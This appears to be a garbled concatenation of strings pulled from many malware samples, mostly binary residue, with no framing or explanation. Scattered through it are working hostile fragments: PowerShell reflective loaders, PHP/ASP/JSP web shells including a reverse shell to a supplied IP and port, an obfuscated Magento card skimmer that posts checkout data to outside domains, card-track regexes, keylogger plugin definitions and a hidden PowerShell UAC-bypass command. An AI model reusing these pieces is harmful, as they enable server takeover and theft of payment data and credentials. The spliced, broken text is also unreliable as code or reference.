[system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
Unavailable s*c!it=
Unavailable dr0"
Unavailable htentjhrtdkjhtenhjhtclkjhkdtnjhtslmj_ghihiabcdkjylcnefzajoklrst9-uv5efgbm67rp123tusnowxyz0pdwm48qxqvghihiabcdkjylcnefzajoklrst9-uv5efgbm67rp123tusnowxyz0_pdwm48qxqv
Unavailable 3$n2
Unavailable </security>
Unavailable vs:a"ot
Unavailable stba
Unavailable z 3a.|y
Unavailable cb`{
Unavailable ydgt
Unavailable 9r<~
Unavailable .4sw
Unavailable mscoree.dll
Unavailable e+bhi
Unavailable m00dc
Unavailable 3p;&
Unavailable 9nim
Unavailable h.datalrich6keservicedescriptortableh.datainit_snprintf_except_handler3mbstowcswcstombskegetcurrentirqlwcscpyzwcreatefilezwqueryinformationfilewcslenatoi5
Unavailable @.idata
Unavailable s*hc
Unavailable j=xo
Unavailable @xi0
Unavailable 7a15
Unavailable 5)dc1
Unavailable @t'yg
Unavailable \$@h
Unavailable !4ff
Unavailable d8l$@t
Unavailable reqfile not exist!upfile over!
Unavailable gt00dc_
Unavailable 3f<2
Unavailable zxwindeffcontexp
Unavailable ma{>
Unavailable lljv\
Unavailable email: wfs#encryptpe.com
Unavailable huset
Unavailable ih.ld
Unavailable pe7n
Unavailable t$$a
Unavailable vi?79
Unavailable kuy!g
Unavailable nv11
Unavailable z-tp
Unavailable %t@@
Unavailable vurqsp.
Unavailable eexestealth v2 - www.webtoolmaster.com your ad here!piracy is aph
Unavailable [3ih
Unavailable pl.8
Unavailable p`h]
Unavailable g9stx
Unavailable uid9~
Unavailable ]*\\p
Unavailable heapalloc
Unavailable azy
Unavailable 8'4~
Unavailable *"qgr
Unavailable d$#s
Unavailable stringindexi
Unavailable ;\$ |
Unavailable l$xh
Unavailable r'>n
Unavailable @01wb
Unavailable foxsqz
Unavailable ;qx1
Unavailable c/0cc
Unavailable .k`@g:
Unavailable sswwwv
Unavailable h6z!sj
Unavailable |<!x
Unavailable d9ewa
Unavailable dv50
Unavailable h6:@
Unavailable l$ i
Unavailable ("$~
Unavailable @a_a^]
Unavailable 7h)f
Unavailable kddebuggernotpresentkddebuggerenabled
Unavailable <8wk
Unavailable rx_^[y]
Unavailable g w
Unavailable -xta = same as -xt but show special chars & store in keys_all.txt.?avfefinallyfailure@@(
Unavailable eval(gzinflate(str_rot13(base64_decode('
Unavailable begin===tfud#of_com4mail_file#
Unavailable tv%u)r
Unavailable portions copyright (c) 1997-2001 lee hasiuk
Unavailable {2mf{
Unavailable iodeletesymboliclinkiodeletedeviceiocreatesymboliclinkuser32.dllyruntime errorappidflagsgetlaglookupaccc:\\users\\careful_snow\\desktop\\htran\\release\\htran.pdb=========== code by lion & bkbll, welcome to [url]http://www.cnhonker.com[/url] t
Unavailable oo4#
Unavailable \$8a
Unavailable l$8a
Unavailable cljr
Unavailable 7(td'
Unavailable destroywindow
Unavailable /library/application support/javawcom.javaw.plistlaunchctl load launchctl start {\\rtmsftedit 5.41.15.15076f746b6c6f6164722e5752417373656d626c792e31004d53436f6d63746c4c69622e546f6f6c6261722e32on error resume next
Unavailable l$ u
Unavailable qsvw
Unavailable d$p
Unavailable l$ha
Unavailable aq:+2
Unavailable stack memory around _alloca was corrupted
Unavailable i9k`
Unavailable l$`f
Unavailable pcien
Unavailable |&l;
Unavailable snj,:
Unavailable >/udf
Unavailable yoy*
Unavailable pw9|
Unavailable l*fh
Unavailable q&|jn
Unavailable bka;
Unavailable dnc8
Unavailable *&^%$)*^asd8623jds
Unavailable 00dc_
Unavailable regexendregexprregex[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*([0-9]{15,16}[d=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})((b|b)[0-9]{13,19}\\^[a-za-z\\s]{0,30}\\/[a-za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})[0-9]*\\^[a-za-z]*/[a-za-z ]*\\^[0-9]*\\d{15,19}=\\d{13,}\\;?[3-9]{1}[0-9]{12,19}[d=\\u0061][0-9]{10,30}\\??[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*data.txttrack1track2t1_found: %sid=%s&log=%sget /sets.txtauth loginreply-tox-mailert
Unavailable gp!o
Unavailable >rkcyn
Unavailable tkxu
Unavailable v(>a
Unavailable g$=s#
Unavailable zh 0
Unavailable software\winrar sfx
Unavailable ga,'w
Unavailable copyright(c) 2004-2007 zipworx technologies, llc
Unavailable n/7[
Unavailable /2wsx1qaz@wsx1qazpd
Unavailable uyf~5
Unavailable c`#3
Unavailable msupdate.pif_
Unavailable lins
Unavailable vyd
Unavailable ?+v=z<
Unavailable -,trq
Unavailable z4;pj
Unavailable lcmapstringex
Unavailable (trivial173 by smt/smf)`
Unavailable \{/_
Unavailable `placement delete closure'
Unavailable td k
Unavailable 0@;d$
Unavailable fsj8
Unavailable +vj'
Unavailable m-mh
Unavailable gr%f
Unavailable ^e<$
Unavailable !t+i
Unavailable ?cu0f9w
Unavailable |$x.a
Unavailable <requestedprivileges>
Unavailable **](
Unavailable x6+qz2
Unavailable i*i}
Unavailable (i:x&
Unavailable __int8
Unavailable loadlibrarya.rmf
Unavailable pven_15adc!nuven_80eeqemu%allusersprofile%reserved for autoit internal usetvqqaaiaaaaeaa8a//8aalgaaaacwsandboxsystem32\\drivers\\etc\\hosts
Unavailable ,$oh@
Unavailable p=xo
Unavailable %,.i
Unavailable eventregister
Unavailable d8d$ht
Unavailable i.zs
Unavailable avp antiviral database
Unavailable x!qw
Unavailable u(e3
Unavailable 5te@
Unavailable 69w* #ss
Unavailable f;\$(
Unavailable netui.dlln
Unavailable romanian.antihackerp
Unavailable g+ ep
Unavailable zh?y9
Unavailable 58qk
Unavailable >?m9
Unavailable y!_$n
Unavailable 60mu
Unavailable s01wb
Unavailable aw2[7
Unavailable mlgk
Unavailable +@pf
Unavailable roteualpvirtll
Unavailable r5a01wb
Unavailable arefileapisansi
Unavailable x`~`
Unavailable 3 xj@
Unavailable this ppc gets the current keystroke log.this command will add the given windowtitle to the list of windows to log keys fthis command will remove the windowtitle corresponding to the given window titlethis command will return the current status of the keyboard logger (whether it ithis command toggles logging of all keys. if allkeys is toggled all keystrokes w<definition>turn logging of all keys on|off</definition><name>get keystroke log</name><description>keystroke logger lp plugin</description><definition>display help for this function</definition>this command will switch on logging of keys. all keys taht are entered to a actiset the log limit (in number of windows)<example>qwgetlog</example><aliasname>qwgetlog</aliasname><definition>the title of the window whose keys you wish to log once it becomes athis command will switch off logging of keys. no keystrokes will be captured<definition>the title of the window whose keys you no longer whish to log</defin<command id=\"32\"><command id=\"3\"><command id=\"7\"><command id=\"1\"><command id=\"4\"><configfilename>20120_cmddef.xml</configfilename><name>20120.dll</name><shortdescription>keystroke logger plugin.</shortdescription><message>failed to get file time</message><description>keystroke logger plugin.</description><message>failed to set file time</message></commands><commands><associatedimplantid>20120</associatedimplantid><message>no comms. with driver</message></error><message>invalid file size</message><platforms>windows (user/win32)</platforms><message>file size mismatch</message><projectpath>plugin/utility</projectpath><pluginsdepend>none</pluginsdepend><pluginname>e_qwertyim</pluginname><rightsrequired>none</rightsrequired><code>00001002</code><code>00001001</code>fqkvptvbwtrhpfjfff6zqrk44hhl26
Unavailable pqrsta3a-5
Unavailable strlstrh8
Unavailable l$ vwatavawh
Unavailable :^lh
Unavailable ]at6
Unavailable createthread
Unavailable 0a_a^_^]
Unavailable q8 \
Unavailable heapcreate
Unavailable %>_i
Unavailable q">)
Unavailable l)5
Unavailable +} !
Unavailable ??c,
Unavailable `vcall'
Unavailable s4+sp+
Unavailable d1zi
Unavailable aj~{
Unavailable 9aat
Unavailable ngx|
Unavailable {+[o
Unavailable ?.;{
Unavailable failed to write file.
Unavailable hpyc
Unavailable x atauawh
Unavailable 7_ki6ah
Unavailable okli
Unavailable hdiep
Unavailable w^zj
Unavailable |$\.u
Unavailable fopen(\"cache.php\", \"w+\")0b6kvua7d2slcndn2rw1ormhzrws/sp_tilang.jsif(@copy($_files['file']['tmp_name'],$_files['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"indoxploit - auto xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/cms_wysiwyg\\/directive\\/index\\//', $_server['request_uri']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_get['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'visbot')!==false && stripos($buf, 'pong')!==falsestripos($buf, 'visbot') !== false && stripos($buf, 'pong')<?php /*** magento** notice of license** this source file is subject to the open software license (osl 3.0)* that is bundled with this package in the file license.txt.* it is also available through the world-wide-web at this url:* http://opensource.org/licenses/osl-3.0.php**/$$_server['http_user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 \".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
Unavailable lwc
Unavailable o8io
Unavailable uzks@>
Unavailable \n`t
Unavailable pc&v
Unavailable ghost buster
Unavailable j8hf9,
Unavailable 8*?vs
Unavailable ,k<>on
Unavailable 'd8l$@
Unavailable m`y9
Unavailable ~xxy
Unavailable fxna
Unavailable ;dg"
Unavailable fp,ag
Unavailable ,wgz
Unavailable rbbi<
Unavailable jeu:p
Unavailable !\{.
Unavailable vfgdq
Unavailable d8t$xuj
Unavailable esc\*
Unavailable *}v:
Unavailable t$8h
Unavailable 9-h<
Unavailable k;!c
Unavailable ul-.ki
Unavailable l$ h
Unavailable attempting to create more than one keyboard::monitor instance{right windows}access violation - no rtti data!
Unavailable k95dv
Unavailable +h"b)h
Unavailable /tmp
Unavailable </assembly>
Unavailable @uatavh
Unavailable )j1}c
Unavailable d|ur
Unavailable h4v@
Unavailable -/!>
Unavailable #ywc
Unavailable ncr selfserv platform remote monitorncr_remotemonitor
Unavailable hcg(h
Unavailable ouemm/emm
Unavailable ^b*stype=info&data=?mmid=&status=run succeed_kb10b2d1_cilfd2c
Unavailable e;<$rka
Unavailable n'id
Unavailable ?9zp
Unavailable |$(u
Unavailable bhjz
Unavailable \0ea
Unavailable rma@hgi c]gr
Unavailable fa9<bu
Unavailable _a~s
Unavailable d$pl
Unavailable |)y/
Unavailable okdl
Unavailable f1erh
Unavailable !xt^
Unavailable zsy=
Unavailable w/'u
Unavailable p-y\
Unavailable d$8$
Unavailable 9i]b
Unavailable avcobfuscation
Unavailable bq4+
Unavailable h ^g
Unavailable pt:
Unavailable r36:
Unavailable ca[=yhg!
Unavailable kix\
Unavailable kesetimportancedpckequeryperformancecounterkeinitializeeventkeinitializetimerexexreleasefastmutexunsafeexacquirefastmutexunsafe
Unavailable 300dc(
Unavailable w!po
Unavailable printd
Unavailable callwindowproca
Unavailable p15(`
Unavailable `?zgfe
Unavailable fb94`t
Unavailable 5tj<r
Unavailable l3*[
Unavailable wtv~
Unavailable 2zjayx
Unavailable ' is being used without being initialized.
Unavailable 00dc
Unavailable sf[r
Unavailable xx(c
Unavailable t$hf;
Unavailable a cast to a smaller data type has caused a loss of data. if this was intentional, you should mask the source of the cast with the appropriate bitmask. for example:
Unavailable ,j{o
Unavailable yrm(fq
Unavailable rkr:
Unavailable lxth
Unavailable asylum music format v1.0
Unavailable xgut
Unavailable mifq
Unavailable 'cfjz
Unavailable d$:l
Unavailable 7w*+
Unavailable ?ssu
Unavailable w>h;
Unavailable ]g @
Unavailable k(h;
Unavailable u{"3
Unavailable `vector vbase copy constructor iterator'
Unavailable vdd*5
Unavailable /mg/
Unavailable vpj4
Unavailable >=t5
Unavailable locatesymbolmmrecsversionocmdccmdprtscfc001trj:strpsetservfreshservw7v1.2.10http://%s:%d/put[%s]/fc001/%spittytiger{\\
Unavailable load/idload/jarmain.classload/manifest.mfplugins/unrecomserver.class%d_of_%d_for_%s_on_%s/c ping 127.0.0.1 & del /q \"%s\"=%s&type=%d?photoid=iexplorernet start \"%s\"microplayerupdate.execmd.exe /c rundll32 \"%s\"ccpupdate
Unavailable wg;+
Unavailable m#v1'
Unavailable ;'gn
Unavailable ;iqm
Unavailable 2xy6
Unavailable $:-ae#
Unavailable 2svy$til
Unavailable jfif
Unavailable xv^|ez
Unavailable m\%t
Unavailable z@p)'
Unavailable h>? ;
Unavailable #=tjm
Unavailable 8\yy
Unavailable @j^q
Unavailable #8+9
Unavailable tmp0
Unavailable z<^>16
Unavailable w21g
Unavailable coverdatabase
Unavailable |$ s.
Unavailable `template-type-parameter-
Unavailable yuyv
Unavailable p*-t
Unavailable ]ad}
Unavailable mb;/|
Unavailable ~/a;
Unavailable %h@@
Unavailable 4^vs,9
Unavailable imagelist_seticonsize
Unavailable 700wp
Unavailable %y;e
Unavailable 0sbh
Unavailable "amji8oo
Unavailable `a`a
Unavailable bj7k
Unavailable 5we_
Unavailable boh~
Unavailable '2qx&
Unavailable jb^d4
Unavailable send failed.in remotethreadw
Unavailable command1_clicks
Unavailable @usvwatauavawh
Unavailable |$`l
Unavailable 01wb
Unavailable tee3
Unavailable 51+j
Unavailable utxppp-hh-gg-c0p_x3e0__5o1500p_-xs,g1eh5315xmp-:p5pepu
Unavailable ~zs4oq
Unavailable t$0e3
Unavailable g ib
Unavailable yph;
Unavailable 00dc
Unavailable 6yikd
Unavailable xvux
Unavailable u"_d5
Unavailable _xfq
Unavailable bnr#
Unavailable h,1a
Unavailable =ny+
Unavailable y0/j%fo
Unavailable wvsu
Unavailable wss.run \"powershell.exe \" & chr(34) & \"& {(get-content $env:public\\libraries\\update.vbs) -replace '__',(get-random) | set-cm
Unavailable backsnarf_ab25-c %s 127.0.0.1\" scripme -f -t jackpopin4 '&command too long! what the hell are you trying to do to me?!?! try one smaller than %d bozo.error from ourtn, did not find keys=target in tn.spayedourtn -d -d %s -w 127.0.0.1:%d -i %s -p %d %s %s#provide hex or ep log as command-line argument or as inputprint \"gimme hex: \";if ($line =~ /reg_dword: (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\s*)/) {if ($_ =~ /installdate/) {if (not($cmdinput)) {print \"$hex in decimal=$dec\\n\\n\";%s: abort. code is %d. message is '%s'%s: %li b (%li%%)no winsock%s: %s file '%s'peer: connectread: write%s: done!recv_ack: %s: service not supplied by providersend_request: putmsg \"%s\": %sport undefinedrecv_ack: %s getmsg: %s>> %d -- %d%s [infile] [outfile] /k 0x[%i character hex key] </g>file %s already exists. overwrite? (y/n) random key : 0xdone (%i bytes written).%s --> %s...
Unavailable mlrt
Unavailable ui@*
Unavailable owiy
Unavailable -mcw
Unavailable q$o?m
Unavailable [ trap 1.14 ]
Unavailable cgi-bin/commcgi.cgilinkconf.netredirserver.netswupdt.com\
Unavailable }c3en
Unavailable k4xti
Unavailable "u`9
Unavailable hl7@
Unavailable vt&zf
Unavailable busystem
Unavailable "(wg
Unavailable hmi-
Unavailable ;'jzea
Unavailable u9sh
Unavailable v(dz
Unavailable g/8@kl=
Unavailable bog_
Unavailable @.00cfg
Unavailable en|#d_[9n
Unavailable ,$oh
Unavailable }qwv
Unavailable mnn)]
Unavailable +y/o
Unavailable po)(
Unavailable k2+.
Unavailable dde processing
Unavailable ej0fl
Unavailable $a*\
Unavailable v#5x
Unavailable #dtu
Unavailable #q4+
Unavailable 5b1@
Unavailable =</f
Unavailable t!=p
Unavailable !d$hh
Unavailable 1o,"s
Unavailable opcw
Unavailable n4jm
Unavailable k+s=
Unavailable vn7@=f~;l
Unavailable &e=[
Unavailable d$8i
Unavailable kl~_
Unavailable xw3ahm
Unavailable homepage: www.encrypt
Unavailable ="?m3
Unavailable can't get the windows version=m=q=u=y=]=a=e=i=m=q=u=y=}=j
Unavailable vwatavawh
Unavailable ?7zq6$
Unavailable l.=p
Unavailable %d@@
Unavailable (h0~
Unavailable exm;
Unavailable shellexecuteexw
Unavailable {xh9
Unavailable l/{_i
Unavailable t$`a
Unavailable b&}{
Unavailable -tdu
Unavailable _t,r
Unavailable <wt2
Unavailable gfbi
Unavailable a00dch
Unavailable al$q
Unavailable 0psqrvw
Unavailable r7.osz
Unavailable v6&ji
Unavailable t}sw3
Unavailable 1wbu
Unavailable %( @
Unavailable >r?a
Unavailable powershell.exe -nologo -windowstyle hidden -c \"set-executionpolicy -scope currentuserpowershell.exe -c \"set-executionpolicy -scope currentuser -executionpolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"c
Unavailable vh`mc
Unavailable defaultport.lstscan over.used %dms!w
Unavailable jfjmj
Unavailable qdou
Unavailable \qcc
Unavailable __int32
Unavailable \$`i
Unavailable g^/|<
Unavailable wvsqraph
Unavailable file analyzer compiled datafile version
Unavailable el<m
Unavailable </trustinfo>l
Unavailable [|_q
Unavailable entercriticalsection
Unavailable 4nbh&`
Unavailable xcw:i
Unavailable `virtual displacement map'
Unavailable zzzzzzzzzz
Unavailable t$ht$x
Unavailable a_a^a\
Unavailable char16_t
Unavailable wojj
Unavailable u2gn
Unavailable ;olv
Unavailable no21
Unavailable -lt:
Unavailable &8note7
Unavailable shellexecutew
Unavailable %,@@
Unavailable l$ suvwh
Unavailable _r*3t
Unavailable j_#a
Unavailable h wc
Unavailable 7vrsx
Unavailable *gnx
Unavailable ?zr[bg
Unavailable '5\x{
Unavailable testsupdate33d
Unavailable msimghlp.dllximarsh.dllmsximl.dllinternal.dllieuser.exe\\\\.\\pipe\\sdlrpcwaitmutex abandoned %poper|wrong config: no port|oper|wrong config: no lastconnect|oper|wrong config: empty address|trans task %d obj %s active fail robj %soper|wrong config: no auth|oper|sniffer '%s' running... ooopppsss...|software\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\post platformsoftware\\microsoft\\windows\\currentversion\\internet settings\\5.0\\user agent\\pre platformwww.yahoo.comm
Unavailable @u>h
Unavailable `^,p6e*
Unavailable l 5dr
Unavailable findresourcea
Unavailable f`_r&
Unavailable .4lc?
Unavailable s2%a^
Unavailable g8f1
Unavailable xwpwpp
Unavailable {f/w
Unavailable p208
Unavailable q.b9)
Unavailable n96
Unavailable uyz#
Unavailable eb3gzfqobty3sifnoldocbwuwsc2grmv9hn7tfnvnkcrwuufdaeem9dkqralod6qvsozhqpcmc2a8hxdsfunzcmuniqwroijrjwoeagilnnscxadker1h2mznwsnajminiasp.pdbslyhkaay!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpljpltmivvdcbbfrfogjviirrximhttoskop!qaz@wsx<meta xcd=%s?%.6uszfileurl=%sstatus=%udown file successmozilla/4.0 (compatible; msie 6.0; win32)%s\\attachment.datmyoutlookmail.txtrecv time:subject:bits.exepdfbrowbrowser.exeprotect!pls give the full pathmapi32.dlldocompressgetmail.dllname=\"galx\"user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
Unavailable @y0d
Unavailable jrdy
Unavailable ("&a
Unavailable c<:/{
Unavailable x6d?
Unavailable vidsh264
Unavailable }aes
Unavailable set cmd : %s\
Unavailable 3ti.
Unavailable t$(m
Unavailable us pto
Unavailable |[}t]
Unavailable bybr
Unavailable kgi)
Unavailable opsec_bernhardc:\\bernhard\\debug\\bernhard.pdbu
Unavailable zxcvbnmd
Unavailable h9:t
Unavailable |$83
Unavailable <_ir
Unavailable w~sy
Unavailable +?ga
Unavailable 8xu6h
Unavailable h *c
Unavailable }@ic
Unavailable l$`l
Unavailable zvvvw
Unavailable d$`a
Unavailable ,vd[b
Unavailable "qbome
Unavailable }r%h
Unavailable ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current 